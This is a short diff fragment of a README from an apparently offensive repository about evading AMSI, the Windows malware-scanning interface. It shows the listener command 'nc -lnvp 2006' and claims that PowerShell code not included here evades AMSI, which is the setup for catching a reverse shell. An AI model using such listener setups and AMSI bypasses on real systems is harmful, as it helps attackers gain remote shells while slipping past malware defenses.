Devshimitsu/AMSI-Evasion/README.md

   <img src="/Screenshot/IP.png">
 </p>

-### Now, if you start a netcat listener on port 2006, and enter the above code into PowerShell
+### Now, if you start a netcat listener on port 2006, and enter the above code into PowerShell, it evades AMSI.

 ```bash
 nc -lnvp 2006